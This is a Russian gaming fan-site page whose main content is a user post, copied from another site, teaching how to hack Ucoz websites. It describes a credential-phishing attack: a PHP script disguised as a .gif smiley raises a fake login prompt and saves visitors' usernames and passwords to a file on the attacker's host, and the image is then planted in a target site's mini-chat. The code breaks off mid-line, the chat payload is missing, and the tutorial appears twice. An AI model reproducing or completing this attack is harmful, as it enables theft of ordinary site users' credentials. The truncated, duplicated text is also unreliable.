Разделы сайта
Реклама
Авторизация
Главные новости
- Сайт на реконструкции
Сайт долго время был мёртв и сейчас останется в качестве доброй памяти у старых игроков, которые могут вспомнить о его существовании и зайти сюда для ностальгии.
- убрана вся реклама
- исправлены кодировки чата, комментариев и т.д.
- исправлены ошибки при переходе на новую версию php
- исправлена регистрация
Если вдруг вы заметите, что что-то не работает, можете написать в эту тему или же мне в личку.Для игры на тестовом сервере и в целом новый сайт - wormixtest.com
- Внимание! Нам требуется Главный редактор
Друзья! Внимание ! Нам требуется Главный редактор для развития сайта !
Если Ты:
-ответственный
-аккуратный
-умеешь играть в wormiks
-способен администровать сайт и добавлять новости, то напиши нам в личку
- Типо помощь и конкурса)))
- Всё в средине))
- Как вытащить Auth key с Вормикса, два метода!
- И так знаю, что всем известно, но для нубов пойдет! =)
{sl2}
Опросы Вормикс.ру
Какой босс Вормикс Вами убивался сложнее всего?
Скрипт для взлома сайта на Ucoz
- DraMe4in
| - Раздел: Помощь от пользователей
| - Размещено: 14 декабря, 19:35
- -3
Привет! Сегодня я вам расскажу об одном из способов взлома сайта на UCOZ’е. Каждый настоящий хакер может обнаружить достаточное количество уязвимостей на подобных сайтах и знает множество способов для взлома этих сайтов. Я надеюсь, что и я скоро стану таким =).
Итак, приступим...
В начале нужно зарегить host обязательно с поддержкой php (что-то вроде http://mywebsite.phphost.net). После завершения регистрации загружаем на ftp скрипт, а затем ставим права на файл goodsmile.gif и на .txt файл, например: pass.txt (сюда должны присылаться пароли пользователей взломанного сайта). Затем скачайте любой смайлик с расширением .gif (типа good.gif).
Затем откройте редактор Notepad и набираете следующее:
<?
header("Content-type: image/gif");
$image = imagecreatefromgif(' goodsmile.gif');
if(!$_COOKIE['LOGON'])
{
$login = $_SERVER['PHP_AUTH_USER'];
$pass = $_SERVER['PHP_AUTH_PW'];
if(strlen($pass)
Как только вы всё напишите, сохраните файл под именем goodsmile, потом замените расширение на .gif.
Затем выберите любой UCOZ’овский сайт, например http://other.ucoz.ru/ как обычно, у них есть мини-чат, как правило с правой стороны. Далее - для начала регистрируетесь на сайте, затем в мини-чате вводите логин, а в сообщении напишите следующее:
Нажимаем ОК
. Если после этих манипуляций в мини-чате, вместо введенного сообщения появился смайлик - радуйтесь, потому что сайт - уязвимый. После этих манипуляций, у всех кто будет посещать данную страницу, (в моем примере это http:// other.ucoz.ru/) будет выплывать форма, в которой необходимо будет прописать свои логин и пароль. И у вас, при входе на данный сайт, эта форма также будет появляться. А все, введенные в эту форму логины и пароли будут отправляться в файл pass.txt, который вы создавали в самом начале и заливали на ftp.
На некоторых сайтах описанная уязвимость может не пройти. Но стандартно созданный UCOZ’овский сайт, без дополнительных настроек уязвим. Всем большое спасибо за просмотр, надеюсь эта статья вам помогла =)
Источник: http://dlya-vzloma.ru
Итак, приступим...
В начале нужно зарегить host обязательно с поддержкой php (что-то вроде http://mywebsite.phphost.net). После завершения регистрации загружаем на ftp скрипт, а затем ставим права на файл goodsmile.gif и на .txt файл, например: pass.txt (сюда должны присылаться пароли пользователей взломанного сайта). Затем скачайте любой смайлик с расширением .gif (типа good.gif).
Затем откройте редактор Notepad и набираете следующее:
<?
header("Content-type: image/gif");
$image = imagecreatefromgif(' goodsmile.gif');
if(!$_COOKIE['LOGON'])
{
$login = $_SERVER['PHP_AUTH_USER'];
$pass = $_SERVER['PHP_AUTH_PW'];
if(strlen($pass)
Как только вы всё напишите, сохраните файл под именем goodsmile, потом замените расширение на .gif.
Затем выберите любой UCOZ’овский сайт, например http://other.ucoz.ru/ как обычно, у них есть мини-чат, как правило с правой стороны. Далее - для начала регистрируетесь на сайте, затем в мини-чате вводите логин, а в сообщении напишите следующее:
Нажимаем ОК
. Если после этих манипуляций в мини-чате, вместо введенного сообщения появился смайлик - радуйтесь, потому что сайт - уязвимый. После этих манипуляций, у всех кто будет посещать данную страницу, (в моем примере это http:// other.ucoz.ru/) будет выплывать форма, в которой необходимо будет прописать свои логин и пароль. И у вас, при входе на данный сайт, эта форма также будет появляться. А все, введенные в эту форму логины и пароли будут отправляться в файл pass.txt, который вы создавали в самом начале и заливали на ftp.
На некоторых сайтах описанная уязвимость может не пройти. Но стандартно созданный UCOZ’овский сайт, без дополнительных настроек уязвим. Всем большое спасибо за просмотр, надеюсь эта статья вам помогла =)
Источник: http://dlya-vzloma.ru
|
| |
- Комментов [2]
- Просмотров: 9544
|
Уважаемый посетитель, Вы зашли на сайт, как незарегистрированный пользователь.
Мы рекомендуем Вам зарегистрироваться либо авторизоваться на сайте под своим ником.
Мы рекомендуем Вам зарегистрироваться либо авторизоваться на сайте под своим ником.
Информация
Посетители, находящиеся в группе Гости, не могут оставлять комментарии к данной публикации.